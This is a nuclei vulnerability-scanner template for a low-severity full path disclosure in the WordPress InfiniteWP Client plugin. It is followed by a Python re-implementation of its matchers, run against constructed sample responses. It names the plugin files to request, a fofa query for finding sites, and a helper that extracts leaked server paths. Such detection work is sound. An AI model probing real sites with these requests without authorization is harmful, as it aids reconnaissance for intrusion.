Vulnerability description
WordPress InfiniteWP Client plugin is vulnerable to full path disclosure via direct access to plugin files. Requesting one of the plugin's PHP files directly, outside the WordPress bootstrap, produces a PHP fatal error whose message echoes the file's absolute path on the server; the template below matches on that error text together with an HTTP 200 response.
id: wp-iwp-client-fpd

info:
  name: WordPress Plugin InfiniteWP Client - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress InfiniteWP Client plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/iwp-client/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: iwp-client
    framework: wordpress
    fofa-query: body="/wp-content/plugins/iwp-client/"
  tags: wp,wordpress,wp-plugin,fpd,iwp-client,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/iwp-client/lib/IWPClass.php"
      - "{{BaseURL}}/wp-content/plugins/iwp-client/backup/backup.class.php"
      - "{{BaseURL}}/wp-content/plugins/iwp-client/lib/phpseclib/Crypt/AES.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Fatal error"
          - "iwp-client"
          - "Uncaught Error:"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022002f74a8b11bac74e1538df15798dc4b0f0250c53037287f63074a02de30eea1402207fcc0f8ed6f50fbc65612e635c9cbc3185181c440e6ef6d9d3c26126f41464d9:922c64590222798bb761d5b6d8e72950
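To see how the template's matchers actually decide, here is an added Python re-implementation of its matching logic (not part of the template or of nuclei): the word matcher with `condition: and`, the status matcher joined by `matchers-condition: and`, the `stop-at-first-match` loop over the three paths, and a helper that pulls the leaked absolute path out of the PHP error text. The three responses in `SAMPLE_SITE` and the `fake_fetch` function are constructed stand-ins for a real HTTP GET, with placeholder paths.

```python
import re
from typing import Callable, Optional, Tuple

Response = Tuple[int, str]  # (status code, body)

# Request paths and matcher values copied from the template above.
PATHS = (
    "/wp-content/plugins/iwp-client/lib/IWPClass.php",
    "/wp-content/plugins/iwp-client/backup/backup.class.php",
    "/wp-content/plugins/iwp-client/lib/phpseclib/Crypt/AES.php",
)
REQUIRED_WORDS = ("Fatal error", "iwp-client", "Uncaught Error:")
REQUIRED_STATUS = (200,)

def word_matcher(body: str, words: tuple, condition: str = "and") -> bool:
    """nuclei 'word' matcher on part: body. 'and' needs every word, 'or' any one."""
    hits = [w in body for w in words]
    return all(hits) if condition == "and" else any(hits)

def template_matches(resp: Response) -> bool:
    """matchers-condition: and -> the word matcher AND the status matcher must pass."""
    status, body = resp
    return word_matcher(body, REQUIRED_WORDS, "and") and status in REQUIRED_STATUS

def leaked_path(body: str) -> Optional[str]:
    """Extract the absolute server path from a PHP fatal-error message, if any."""
    m = re.search(r" in (/[^\s:]+\.php)", body)
    return m.group(1) if m else None

def first_match(fetch: Callable[[str], Response]) -> Optional[str]:
    """stop-at-first-match: probe PATHS in order and stop at the first hit."""
    for path in PATHS:
        if template_matches(fetch(path)):
            return path
    return None

# Constructed sample responses (placeholder paths, not from any real host): the first
# file echoes a PHP error, the second is blank (display_errors off), the third is blocked.
LEAKING_BODY = ("<b>Fatal error</b>:  Uncaught Error: Class 'IWP_MMB_Core' not found in "
                "/var/www/html/wp-content/plugins/iwp-client/lib/IWPClass.php:12")
SAMPLE_SITE = {
    PATHS[0]: (200, LEAKING_BODY),
    PATHS[1]: (200, ""),
    PATHS[2]: (403, "Forbidden"),
}

def fake_fetch(path: str) -> Response:
    """Stand-in for an HTTP GET, serving the constructed responses above."""
    return SAMPLE_SITE[path]
```

Only the first constructed response satisfies both matchers, so `first_match(fake_fetch)` stops there; the blank body and the 403 show what a site with `display_errors` off or direct PHP access blocked returns, which is what removes the finding.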